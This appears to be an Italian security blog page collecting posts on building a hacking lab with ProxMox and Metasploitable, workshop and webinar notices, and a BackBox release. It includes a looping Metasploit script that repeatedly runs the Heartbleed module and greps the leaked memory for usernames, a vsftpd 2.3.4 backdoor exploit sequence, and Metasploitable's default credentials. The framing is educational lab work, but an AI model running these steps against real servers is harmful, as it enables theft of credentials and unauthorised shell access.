Articoli

, ,

Hacking Lab con ProxMox e Metasploitable

Il FabLab Bassa Romagna e ImoLUG hanno intrapreso un percorso di approfondimento su ProxMox, un progretto OpenSource basato sul sistema operativo Debian Linux per la virtualizzazione di sistemi operativi, incontrandosi ogni martedì per affrontare tematiche diverse.

Martedì 23 Maggio sarò ospite al FabLab Bassa Romagna per insegnare come è possibile creare un proprio Hacking Lab. Creare un laboratorio nella propria infrastruttura di rete permette di allenarsi in assoluta legalità sulle principali tecniche sfruttate nel mondo del Hacking.

Per creare il proprio laboratorio virtualizzeremo Metasploitable, una famosa distribuzione vulnerabile creata da Rapid7, ovviamente su ProxMox e sfrutteremo BackBox Linux per effettuare i test di Sicurezza Informatica.

Entrando più nel dettaglio sfrutteremo software come nmap, zenmap, dirsearch, sqlmap e metasploit. Analizzeremo le vulnerabilità Command Execution, SQL Injection, XSS Reflected, XSS Stored e magari anche altre in base al tempo rimasto.

L’incontro inizierà alle 20:30 del 23 Maggio 2017 presso la sede del FabLab Bassa Romagna, Via Vassura 16/F a Cotignola. È gradita la prenotazione tramite Doodle!

Per chi non riuscisse a venire da Mercoldì 24 troverà, in questo articolo, le slide dell’evento e forse anche uno screencasting!

[ AGGIORNAMENTO ]

Le slide sono disponibili su SlideShare, lo screencasting a breve…

, ,

Hacking Lab: Virtualize Metasploitable on ProxMox

Proxmox is open source server virtualization management software. It is a Debian-based Linux distribution  and very perfect to create your Hacking Lab on your local networking.

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Never expose this VM to an untrusted network 😉 it’s very dangerous!

On my YouTube you can find a video guide about virtualization of Metasploitable on ProxMox!

Finally, you can find a list of all vulnerabilities in Metasploitable on the official Rapid7 website.

Metasploit & Heartbleed – Rendere ricorsivo l’exploit

Heartbleed

Heartbleed è un’importante vulnerabilità del popolare software OpenSSL, CVE-2014-0160, il bug consente di leggere fino a 64KB di memoria dal server vulnerabile, con la possibilità di compromettere le chiavi segrete utilizzate per identificare i fornitori dei servizi e per crittografare il traffico, i nomi e le password degli utenti.

Metasploit include un modulo per verificare se un server è vulnerabile o meno, se è vulnerabile permette allora di estrarre la chiave privata RSA e il data leak di 64KB. Se vogliamo lavorare sul data leak per intercettare le richieste GET generate con il protocollo HTTPS dovremmo rendere ricorsivo l’attacco, funzione purtroppo non implementata da Metasploit. Conseguentemente dovremmo ripetere manualmente il comando run ogni qualvolta vogliamo estrarre il traffico dal server vulnerabile.

Per rendere automatica l’estrazione della memoria, ripetendo il comando ogni X secondi mi sono creato un semplice script da eseguire tramite il nostro terminale. Questo ci permetterebbe di estrarre il Data Leak del server in maniera ricorsiva per tutto il tempo che riteniamo necessario.

Metasploit & Heartbleed – Rendere ricorsivo l’exploit

heartbleed.rc

Il primo passaggio da effettuare è quello di creare con il vostro editor di testo preferito il file heartbleed.rc ed editarlo come segue:

use auxiliary/scanner/ssl/openssl_heartbleed
spool /home/Scrivania/heartbleed_script/output_metasploit.txt
set RHOSTS XXX.YYY.ZZZ.JJJ
set verbose true
run

exit

 

Dovrete personalizzare questo script inserendo la corretta destinazione di spool, ovvero dove Metasploit genererà il file di log con il Data Leak e l’indirizzo IP del host remoto. Infine vi ricordo che tra i comandi run ed exit deve esserci un a capo.

Ciclo While

Il passaggio successivo è quello di lanciare Metasploit richiamando il precedente Run Commands ogni XX secondi, useremo un semplicissimo ciclo while da lanciare sul nostro terminale:

while true; do sudo msfconsole -r heartbleed.rc; sleep XX; done

Andando a sostituire XX con i secondi necessari alla ripetizione dell’exploit, ponderate questo valore in base al traffico del server e anche alla velocità della vostra linea.

Grep

Avviando lo script inizierà a generarsi il file di log output_metasploit.txt, precedentemente specificato, dopo diverse ore/giorni di esecuzione risulterà molto difficile leggere il file di log vi consiglio quindi di sfruttare grep per estrarre le porzioni di log che possono interessarvi, ecco un semplice esempio per estrarre ogni porzione di memoria contenente la parola username:

grep -oiE “.{0,20}.username.{0,20}” output_metasploit.txt | uniq

Il comando Grep vi estrarrà dal log tutte e porzioni di memoria contenete la parola username mostrandovi anche i precedenti e successivi 20 caratteri il tutto in No Case Sentitive. Infine ho aggiunto il comando uniq per semplificare l’output evitando doppioni.

eLearnSecurity: da XSS ad amministratore di Active Directory

xss-to-domain-ita

 

Domani 28 ottobre 2014 alle ore 19:00 il ricercatore e istruttore Davide Girardi, conosciuto anche come GiRa, presenterà uno scenario d’attacco a una rete aziendale attraverso un Webinar offerto dalla eLearnSecurity. L’esploitation inizierà da un XSS nel blog aziendale e ci porterà ad avere un account come amministratore di Active Directory. Avrai l’opportunità di assistere ad affascinanti dimostrazioni pratiche di utilizzo di BeEF-XSS, Metasploit ed approfondire le tue conoscenze su Active Directory.

Per chi vuole iscriversi al Webinar può accedere al sito ufficiale dell’eLearnSecurity!

[eLearning] Post Exploitation! L’attacco è solo l’inizio…

webinar-post-exploitation

Continuano i webinar di eLearnSecuirty, il prossimo 17 Dicembre 2013 dalle 21:30 per circa un ora verrà presentato gratuitamente il corso dedicato alle fasi successiva al Exploitation.

La fase di post exploitation è la fase finale del processo di Penetration Testing, nella quale è possibile garantirsi accesso con privilegi elevati alla rete remota, al fine di appropriarsi dei dati dell’organizzazione.

In questo webinar verrà data una dimostrazioni pratica di come un penetration tester utilizza tecniche e metodologie utili per ottenere i privilegi massimi sulle macchine compromesse e mantenere l’accesso alle stesse.

Tramite gli scenari presenti nel laboratorio virtuale Hera Lab (Made in eLearnSecurity) verranno utilizzati tool come Metasploit e messe in pratica tecniche di Data Harvesting, Privilege Escalation, Maintaining Access, Pivoting, Network Mapping e molto altro ancora.

Per chi è interessato può registrarsi gratuitamente al webinar mediante il sito ufficiale.

Metasploitable – Una macchina virtuale vulnerabile

Metasploitable è una macchina virtuale volutamente vulnerabile basata sul sistema operativo Linux. Questa distribuzione nasce con l’intento di effettuare delle simulazione di Penetration Testing a fini didattici, come si intuisce dal nome del software le vulnerabilità introdotto in queste distribuzione sono verificabile e sfruttabili attraverso Metasploit.

Recentemente Metasploitable ha raggiunto la seconda versione nella quale sono presenti i seguenti servizi con relative porte:

  • 21/tcp open ftp
  • 22/tcp open ssh
  • 23/tcp open telnet
  • 25/tcp open smtp
  • 53/tcp open domain
  • 80/tcp open http
  • 111/tcp open rpcbind
  • 139/tcp open netbios-ssn
  • 445/tcp open microsoft-ds
  • 512/tcp open exec
  • 513/tcp open login
  • 514/tcp open shell
  • 1099/tcp open rmiregistry
  • 1524/tcp open ingreslock
  • 2049/tcp open nfs
  • 2121/tcp open ccproxy-ftp
  • 3306/tcp open mysql
  • 3632/tcp open distccd
  • 5432/tcp open postgresql
  • 5900/tcp open vnc
  • 6000/tcp open X11
  • 6667/tcp open irc
  • 6697/tcp open unknown
  • 8009/tcp open ajp13
  • 8180/tcp open unknown
  • 8787/tcp open unknown
  • 39292/tcp open unknown
  • 43729/tcp open unknown
  • 44813/tcp open unknown
  • 55852/tcp open unknown

Potete scaricare Metasploitable attraverso Source Forge mentre trovate una valida guida sul sito internet ufficiale.

Infine vi ricordo che i dati di login e password sono: msfadmin:msfadmin.

Fonte | ClsHack

[AGGIORNATO] Rilasciato BackBox 2!

La nuova BackBox 2 è stata appena rilasciata dal Team di sviluppatori guidato da Raffaele Forte, BackBox è una distribuzione di Penetration Testing basata su uBuntu e completamente Open Source.

All’avvio di BackBox 2 si notano immediatamente i cambiamenti, innanzitutto una velocità di boot nettamente migliorata seguita dal nuovo sfondo che fa da contorno al ultimissimo ambiente grafico XFCE 4.8 che introduce la barra di avvio veloce e il menu nella parte alta dello schermo.  Il menu “Hacking” rinominato in “Audit” per rendere più professionale la distribuzione è stato completamente riorganizzato raccogliendo le nuove sezioni dedicate all’Informatica Forense e al Voip Hacking oltre ai principali strumenti per testare la sicurezza dei sistemi informatici.

Veramente interessante la nuova sezione dedicata all’Analisi Forense poiché associata ad una distribuzione completamente Open Source la rendono uno strumento in linea con le precise metodologie tecniche, contemplate dalla manualistica scientifica più autorevole della disciplina forense. Nella distribuzione sono già preinstallati gli strumenti: cdfldd, ddrescue, ddf, foremost, photorec, scalpel, testdisk, pdfid, pdf-parse, steghide e vinetto.

La sezione Voip Hacking include invece un kit di strumenti in grado di testare i diversi centralini e sistemi di comunicazione tramite protocollo IP; le utility pre installate sono: svcrack, svcrash, svreport, svwar and sipcrack.

L’introduzione del Utility Openvas (Open Vulnerability Assessment System) permette di effettuare scansioni in rete e analizzare eventuali vulnerabilità oltre all’ormai fondamentale Frameworkd Metasploit aggiornata alla versione 4.

Ma anche le categorie storiche non sono state trascurate, sono stati introdotti più di 30 nuove utility ed aggiornate alle ultime release disponibili le precedenti.

Infine sono stati piccoli bug che affliggevano le precedenti versioni.

[15 Settembre 2011 – Fonti Aggiornate]

BackBox 2 è disponibile al download in versione 32 Bit e 64 Bit ai seguenti link:

BackBox Linux 2 – i386

Release: 03.09.2011

Name: backbox-2-i386.iso

Size: 913,5 MB

MD5: db960e7f449185aeb47efa29580b5528

TorrentMultiupload

Mirror #1Mirror #2Mirror #3Mirror #4Mirror #5

BackBox Linux 2 – amd64

Release: 03.09.2011

Name: backbox-2-amd64.iso

Size: 945,1 MB

MD5: 41468dd78301be3942aaf607c31141bd

TorrentMultiupload

Mirror #1Mirror #2Mirror #3Mirror #4 – Mirror #5

Infine vi riporto il Change Log ufficiale

What’s new

  • System upgrade
  • Performance boost
  • New look and feel
  • Improved start menu
  • Bug fixing
  • Hacking tools new or updated
  • Three new section: Vulnerabilty Assessment, Forensic Analysis and VoIP Analysis
  • Much, much more!

System requirements

  • 32-bit or 64-bit processor
  • 256 MB of system memory (RAM)
  • 2 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port

[VIDEO GUIDA] Armitage & Metasploit

Il Team di Armitage (veste grafica per la famosa suite Metasploit) ha recentemente rilasciato sei video guide che illustrano passo a passo come sfruttare la potenzialità dei due software per testare la sicurezza di un sistema informatico.

Armitage è disponibile per i sistemi operativi Linux, Mac OS X e Windows ed possibile scaricare il software sul sito ufficiale.

Per chi è interessato ad integrare Armitage in BackBox vi invito a leggere l’articolo di SystemOverde.

Dopo il salto potete visualizzare le video guide in lingua inglese. Continua a leggere

Exploit Search – Il Motore di Ricerca di Exploit

Exploit Sarch è un nuovo motore di ricerca dedicato agli Exploit, esso è infatti in grado di ricercare exploit su diversi portali di sicurezza informatica come NVD, OSVDB, SecurityFocus, Exploit-DB, Metasploit, Nessus, OpenVAS e PacketStorm.

Il servizio nonostante si ancora in fase beta fa il suo compito in maniera egregia ed è accessibile al seguente link: http://www.exploitsearch.net

[VIDEO] Dimostrazione della BackDoor di VSFTPD

Versione:
vsftpd-2.3.4 del 30/06/2011

Dimostrazione Metasploit:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a